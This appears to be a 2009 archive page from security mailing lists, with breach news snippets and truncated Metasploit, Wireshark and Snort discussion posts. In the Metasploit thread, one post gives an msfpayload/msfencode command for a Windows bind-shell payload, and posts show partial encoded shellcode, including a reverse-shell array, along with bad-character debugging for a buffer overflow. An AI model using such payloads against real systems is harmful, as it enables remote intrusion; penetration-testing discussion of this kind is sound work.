More than 100,000 German credit cards are being replaced after fears that
personal data has been stolen, German press reports say.

The reports say that the Volks- and Raiffeisenbank group alone is
recalling 60,000 cards.

Fraudsters are thought to have stolen data on German customers from a
service provider in Spain. There have been no actual reports of fraud.

[...]

Canada: Personal info at risk when items go missing lyger (Nov 18)
http://www.torontosun.com/news/canada/2009/11/18/11785441-sun.html

The personal information of taxpayers may be at risk because of a series
of security breaches at the Canada Revenue Agency.

Documents obtained by Ottawa researcher Ken Rubin reveal that lost mail,
missing shipments of computers or other data storage devices, and the
theft of computers that might contain tax records, is an ongoing problem.

"Our analysis revealed an...

NE: Personal info jeopardized after Workers' Comp Court computer hacked lyger (Nov 17)
http://journalstar.com/news/local/crime-and-courts/article_b9a02f46-d3a9-11de-85e5-001cc4c002e0.html

The Nebraska State Patrol and FBI are trying to figure out who hacked into
a Nebraska Workers' Compensation Court computer server -- and whether the
hacker took personal information.

The state agency learned last week someone had broken into a server that
temporarily held injury reports, said Glenn Morton, court administrator
for the...

Metasploit — Development discussion for Metasploit, the premier open source remote exploitation tool

Slackware 13.0 packaging issue Marco Bonetti (Nov 26)
Hello list,
I'm the framework mantainer over at SlackBuilds.org, a place where to
find SlackBuild scripts for packaging Slackware programs. I'm writing
here because I've found a strange issue when trying to package the
latest release and I'm seeking some help.
The problem is that if I install the framework using the official
installer everything is smooth while, on the other side, with my
instructions (attached to this mail) looks like the...

Re: Framework Digest, Vol 22, Issue 23 OSMAN ELSAHIB (Nov 24)
hi list,

i'm having a strange problem here, i'm using 3.3 fresh download from the website on windows 2003 server, i used the
autopwn command and it started running, but it suddenly showed a very quick msg on the screen other than the usual
output for autopwn and the bash shell terminated, i didn't get a chance to look at the error but i found a file called
"rubystackdump" with the following content:...

Re: Metasploit mini end? HD Moore (Nov 24)
Correct - we will start publishing snapshots and mini's again in a
couple weeks, until then you have to roll your own.

-HD

Metasploit mini end? Soporte Exocet (Nov 24)
http://metasploit.com/releases/framework-3.3-dev-mini.tar.bz2 no more
avarible?

Re: Encoder PexFnstenvSub Pedro Drimel (Nov 23)
Yep, most likely I need to evaluate the bad characters, I sent a
string with all the characters, figured out x0d didn't let get into
the JMP ESP, after removing it I was able to read (following the
stack) all other characters however I'm still not sure if I am doing
it correctly.

Anyway, that's not a metasploit bug or so and thank you very much for
your support.

Regards,

Pedro.

2009/11/23 HD Moore <hdm () metasploit com>:

Re: Encoder PexFnstenvSub HD Moore (Nov 23)
It still sounds like you need to figure out bad characters, however you
can try the shortcut (pure alpha)

$ msfpayload windows/shell_bind_tcp R | \
msfencode -e x86/alpha_mixed -t ruby AllowWin32SEH=true

[*] x86/alpha_mixed succeeded with size 795 (iteration=1)
buf =
"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48" +
"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41" +...

Re: Encoder PexFnstenvSub Pedro Drimel (Nov 23)
I used the manual way but it's still weird, could get it working using
framework-2.7 via web but not thru msfpayload/msfencode, even with
current framework 3.3.

Working: via msfweb - badchards: 0x00 0x0d

/* win32_reverse - EXITFUNC=seh LHOST=192.168.230.130 LPORT=4321
Size=312 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
"\x33\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x06"...

Re: errors using dns_enum Chris Calaf (Nov 23)
duh, I think I may have figured it out. Must be my FW in my home lab causing
the issue. I just tried it again on another network and it ran fine.

Re: errors using dns_enum Carlos Perez (Nov 23)
Sorry for not replying to your last email, I spent the entire afternoon
doing several installs of BT4 and on my wifes mac with Macports and I could
not replicate this problem, do you have BT4 on a VM that you can share with
me? are you running it form msfconsole? I found weird the error abot rails.
Does anybody else in the mailing list experiencing this error?

Cheers,
Carlos

Re: Encoder PexFnstenvSub Rob Fuller (Nov 23)
Follow the crash step by step and compare chars, see which has changed once
it hits the stack and add those to your bad chars list. (that's the manual
way at least, not sure if there is a more advanced way)

Re: errors using dns_enum Chris Calaf (Nov 23)
I'll try this again because it seems like my post are not getting through.

osx:
msf auxiliary(dns_enum) > ruby -v
[*] exec: ruby -v

ruby 1.8.7 (2009-06-12 patchlevel 174) [i686-darwin10]
msf auxiliary(dns_enum) > info

Name: DNS Enumeration Module
Version: $Rev: 7500
License: Metasploit Framework License (BSD)

Provided by:
Carlos Perez <carlos_perez () darkoperator com

Basic options:
Name Current
Setting...

Re: Encoder PexFnstenvSub Pedro Drimel (Nov 23)
It is actually a badchars issue. I compared the output I had with the
one generated with 2.7 version and it's different. Probably, in the
past I had to deal with badchars but don't remember what I did.

Tried to run into my buffer the following:

string =
("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e"...

Re: [Good Ruby Book] Rory McCune (Nov 23)
The well grounded rubyist is a recent addition and is excellent at
explaining a lot of the details behind ruby. Probably not a book for
an absolute beginner , but a great choice for 2nd book to read.

Cheers

Rory

Sent from my iPhone

On 23 Nov 2009, at 14:29, ricky-lee birtles <mr.r.birtles () gmail com>
wrote:

Re: [Good Ruby Book] HD Moore (Nov 23)
Free book (somewhat older):
http://www.ruby-doc.org/docs/ProgrammingRuby/

The Programming Ruby 1.9.1 book looked decent and can be purchased at:
http://www.pragprog.com/titles/ruby/programming-ruby

-HD

Re: Encoder PexFnstenvSub HD Moore (Nov 23)
The metasploit:55555 server is just msfweb from Metasploit 2.7, you can
download and run it yourself if you like, but there are really good
reasons for it being offline:

1) The payloads do not work on newer versions of Windows
2) The payloads do not work with newer CPUs with NX support
3) The payloads have since been improved (reliability) and shrunk

The supported way is msfpayload with msfencode, the "pexfnstenvsub"
encode was not...

Wireshark — Discussion of the free and open source Wireshark network sniffer. No other sniffer (commercial or otherwise) comes close. This archive combines the Wireshark announcement, users, and developers mailing lists.

When are payload lengths greater than the negotiated MSS? Ashwin Rao (Nov 26)
Hi,

The following traces are of a connection between a client and server
running on the same machine. The connection is over a local loop and
the MTU is limited to 1500 bytes for the local loop device.

During connection establishment the MSS exchanged is 1460 as shown
in the three way handshake sniffed using Wireshark (displayed using
tshark)

1 11.210844 127.0.0.1 -> 127.0.0.1 TCP 50930 > 15001 [SYN] Seq=0
Win=5840 Len=0 MSS=1460...

Re: add timestamp to fieldlist in wireshark Sheahan, John (Nov 26)
Did you try tshark -t e

-----Original Message-----
From: wireshark-users-bounces () wireshark org [mailto:wireshark-users-bounces () wireshark org] On Behalf Of haneugen
() yahoo de
Sent: Thursday, November 26, 2009 10:56 AM
To: wireshark-users () wireshark org
Subject: [Wireshark-users] add timestamp to fieldlist in wireshark

Hi,
I am using tshark to extract all the fields I need out of a capture and to further process them. But as you know...

add timestamp to fieldlist in wireshark haneugen () yahoo de (Nov 26)
Hi,
I am using tshark to extract all the fields I need out of a capture and to further process them. But as you know
processing becomes much easier when working with numerical values instead of having to parse strings thus I would like
to add a field containing the unix timestamp (relative_time is unfortunately not sufficient) to the tshark field list.
Does anybody has an idea how to do that, e.g. which field to add?
Thanks in advance.
Cheers

Re: how to save RTP payload in WS v1.2.4 joe tozer (Nov 26)
Ignore my previous post, I mis-understood, and thanks, again, I've found
the tool now.

In message <ea5883bd999b4afb0426d4d25887763b () xs4all nl>, Jaap Keuter
<jaap.keuter () xs4all nl> writes

Re: how to save RTP payload in WS v1.2.4 joe tozer (Nov 26)
OK, thanks, I'll subscribe (though in this case I am actually looking at
MPEG video/transport stream multicast)

In message <ea5883bd999b4afb0426d4d25887763b () xs4all nl>, Jaap Keuter
<jaap.keuter () xs4all nl> writes

Re: how to save RTP payload in WS v1.2.4 Jaap Keuter (Nov 26)
Hi,

This has moved to the (usually) more appropriate Telephony menu.

Thanks,
Jaap

how to save RTP payload in WS v1.2.4 joe tozer (Nov 26)
In earlier versions of WireShark, say 1.0.3, if I wanted to save the RTP
payload from a capture I'd do the following:

Highlight a packet in the stream I wanted to save
Select the "statistics" menu
Hover on "RTP"
Select "stream analysis"
Open the new window WireShark had created
Select "forward" on the “Channels” radio button
Click "save payload"

I could then replay the saved RTP payload...

Re: End to End VoIP delay calculation Martin Mathieson (Nov 26)
There is the RTCP roundtrip network propagation delay. If the necessary
reports are present and properly formatted, there will be an expert info
item for any calculations that may be made. You will need to enable this
calculation in the RTCP dissector preferences.

Here is the extract from RFC 3550, section 6.4.1, that describes how the
calculation should be done:

delay since last SR (DLSR): 32 bits
The delay, expressed in units of...

Debugging Wireshark dissector plugins sean bzd (Nov 25)
Folks,
Can anyone advice how I can debug custom dissector plugins? Using printfs,
logs, live debugging etc... I'm using Windows XP OS, MS Visual Studio 2008.

Any help is appreciated.

Thanks,
Sean

Re: End to End VoIP delay calculation Martin Visser (Nov 25)
As RTP in each direction is unacknowledged (you have a unidirectional stream
going each direction) there is no way to determine end-to-delay from that. I
think the best you can do is look at the SIP request/response time as an
estimate.

Regards, Martin

MartinVisser99 () gmail com

On Wed, Nov 25, 2009 at 4:31 AM, capricorn 80
<cool_capricorn80 () hotmail com>wrote:

Bugzilla upgraded Gerald Combs (Nov 25)
I've upgraded bugs.wireshark.org to the latest stable release (3.4.4).
If you find a problem, please file a bug. (If even that's not working
please send me an email).

buildbot failure in Wireshark (development) on OSX-10.5-ppc buildbot-no-reply (Nov 25)
The Buildbot has detected a new failure of OSX-10.5-ppc on Wireshark (development).
Full details are available at:
http://buildbot.wireshark.org/trunk/builders/OSX-10.5-ppc/builds/628

Buildbot URL: http://buildbot.wireshark.org/trunk/

Buildslave for this Build: osx-10.5-ppc

Build Reason:
Build Source Stamp: 31077
Blamelist: etxrab,jake

BUILD FAILED: failed compile

sincerely,
-The Buildbot

buildbot failure in Wireshark (development) on OSX-10.5-x86 buildbot-no-reply (Nov 25)
The Buildbot has detected a new failure of OSX-10.5-x86 on Wireshark (development).
Full details are available at:
http://buildbot.wireshark.org/trunk/builders/OSX-10.5-x86/builds/883

Buildbot URL: http://buildbot.wireshark.org/trunk/

Buildslave for this Build: osx-10.5-x86

Build Reason:
Build Source Stamp: 31077
Blamelist: jake

BUILD FAILED: failed compile

sincerely,
-The Buildbot

Re: MTU - wireshark showing length longer than. Ant Mitchell (Nov 25)
Good idea, maybe so !. Turned it off:
sudo /sbin/ethtool -k eth2
Offload parameters for eth2:
rx-checksumming: on
tx-checksumming: on
scatter-gather: on
tcp segmentation offload: off

But this didn't make any difference on its own. Both wireshark and
tcpdump still show packet lengths greater than the MTU.

I then played with the receive buffer sizes some more:
net.core.rmem_max = 72000
net.ipv4.tcp_rmem = 4096 9000 9000

The packet length then...

[RFC] Adding plugin for Linux Ftrace Steven Rostedt (Nov 25)
Hi all,

I'm the Linux Kernel Ftrace maintainer. If you do not know what ftrace
is, you can take a look at:

http://people.redhat.com/srostedt/ftrace-tutorial-linux-con-2009.odp

or this:

http://lwn.net/Articles/290277/

Anyway, ftrace is a nice tool that does internal tracing of the kernel.
It features a full function tracer, latency tracers and event tracing.
Events are being added quite frequently by other kernel maintainers so
that they can...

Snort — Everyone's favorite open source IDS, Snort. This archive combines the snort-announce, snort-devel, snort-users, and snort-sigs lists.

debug configure option alessandrorguard-snortml (Nov 26)
Do theese commands:

configure --enable-debug
(make && make install)
export SNORT_DEBUG=4294967295
snort -c /etc/..........

still work?
I see nothing new in output...
Where shoul i see something?

Alessandro R

------------------------------------------------------------------------------
Let Crystal Reports handle the reporting - Free Crystal Reports 2008 30-Day
trial. Simplify your report design, integration and deployment - and focus...

Sourcefire VRT Certified Snort Rules Update 2009-11-25 Research (Nov 25)
Sourcefire VRT Certified Snort Rules Update

Synopsis:
The Sourcefire VRT is aware of a vulnerability in Microsoft Internet
Explorer.

Details:
Microsoft Internet Explorer Code Execution:
Microsoft Internet Explorer suffers from a programming error that may
allow a remote attacker to execute code on an affected system. The
issue is present when the application attempts to parse an invalid
reference type in an HTML tag. This affects Internet...

Re: Bad Traffic rules messed up... Richard Ullrich (Nov 25)
Hmm... My bad - I thought it was all one line...
What happened to rules 526, 528, 1321, 1322, 1431? They get deleted ?

Wonder if I'm having a 'script' error on my end...

Sorry for the 'FP'
Guess that'll teach me to engage my email before putting the brain in gear! <G>

Richard

------------------------------------------------------------------------------
Let Crystal Reports handle the reporting - Free Crystal Reports 2008 30-Day...

Re: Bad Traffic rules messed up. Nigel Houghton (Nov 25)
So a comment is a problem? I see the comment, I don't see a problem
using the file.

Re: Bad Traffic rules messed up. evilghost () packetmail net (Nov 25)
I suspect the issue is that there are no comments in bad-traffic.rules
aside from the SF disclaimer/header except "#linux happens. Blah" on
line 30, which is a little out of place and non-descriptive.

-evilghost

Nigel Houghton wrote:

------------------------------------------------------------------------------
Let Crystal Reports handle the reporting - Free Crystal Reports 2008 30-Day
trial. Simplify your report design,...

Re: Bad Traffic rules messed up... Nigel Houghton (Nov 25)
Would you mind actually providing details? No idea what you are
talking about, what the error might be, etc...

Bad Traffic rules messed up... Richard Ullrich (Nov 25)
Seems there's a problem with the 'bad-traffic' rules... rather a 'prophetic' statement in the rules file... <G>

"linux happens. Blah"

------------------------------------------------------------------------------
Let Crystal Reports handle the reporting - Free Crystal Reports 2008 30-Day
trial. Simplify your report design, integration and deployment - and focus on
what you do best, core application coding. Discover what's...

Re: missing HTML code Jefferson, Shawn (Nov 25)
Hi,

You may not be inspecting the traffic that deep into the http session, or perhaps your snort setup is not send the
alerts since it has already alerted the maximum number of times on that traffic.

There are a couple of settings in Snort that you probably will want to look into:

http_inspect server_flow_depth, client_flow_depth

and

config event_queue

http://www.snort.org/assets/125/snort_manual-2_8_5_1.pdf...

Re: netflow input Matt Olney (Nov 25)
Well....

You're looking at two very different detection methodolgies, so while
Snort does provide a detection engine and an alerting platform, it
really isn't geared towards statistical analysis, which is what you're
going to look for from netflow data.

Snort just isn't the tool for this. Check out the other Netflow
options and failing that, throw flow-tools on a box and start
scripting up some perl logic.

Good luck

matt...

Re: netflow input Olivier Bilodeau (Nov 25)
Hi Rob,

I CC'ed the list.

>> On Tue, Nov 24, 2009 at 6:54 PM, Olivier Bilodeau wrote:
>>
>> Is there a way to give netflow traffic to snort?

Rob Dixon wrote:

yes I checked it, there is no alarm mechanism / rule engine. It's more a
monitoring tool than an IDS.

nProbe collects netflow but doesn't come with an alarm mechanism / rule
engine so we would need to write our own and it defeats the purpose of
trying to...

Re: error while installing snort inline Nigel Houghton (Nov 25)
and what you really don't want to do is run 2.6.1, Snort is currently
at 2.8.5.1.

If you want inline, I suggest ./configure --enable-inline with Snort
from snort.org instead of using an old version of snort-inline.

Re: Bad ET rule this morning Matt Jonkman (Nov 25)
Fixed up. Thanks!

James Lay wrote:

Re: error while installing snort inline Will Metcalf (Nov 25)
Actually you really don't want to log directly to a db from snort when
running in inline mode. You want to log to unified output and have
barnyard put entires into a db for you.

Regards,

Will

------------------------------------------------------------------------------
Let Crystal Reports handle the reporting - Free Crystal Reports 2008 30-Day
trial. Simplify your report design, integration and deployment - and focus on
what you do best,...

error while installing snort inline Adam Szabo (Nov 25)
Hi,

I'm trying to install Snort Inline 2.6.1.5 on Ubuntu 9.04 following this
tutorial: http://openmaniak.com/inline_tutorial.php
When i try to compile it with './configure --with-mysql' it works, but when
i do the 'make' command it returns an error:

"In function 'open',
inlined from 'server_stats_save' at server_stats.c:328:
/usr/include/bits/fcntl2.h:51: error: call to '__open_missing_mode' declared
with attribute error: open with O_CREAT...

Bad ET rule this morning James Lay (Nov 25)
For what it¹s worth:

Nov 25 06:25:20 node snort[18631]: FATAL ERROR:
/chroot/snort/etc/snort/rules/emerging-drop.rules(49) => Empty IP used
either as source IP or as destination IP in a rule. IP list: [].

Had this happen on three separate machines after update.

James
------------------------------------------------------------------------------
Let Crystal Reports handle the reporting - Free Crystal Reports 2008 30-Day
trial. Simplify...

We're always looking for great network security related lists to archive. To suggest one, mail Fyodor.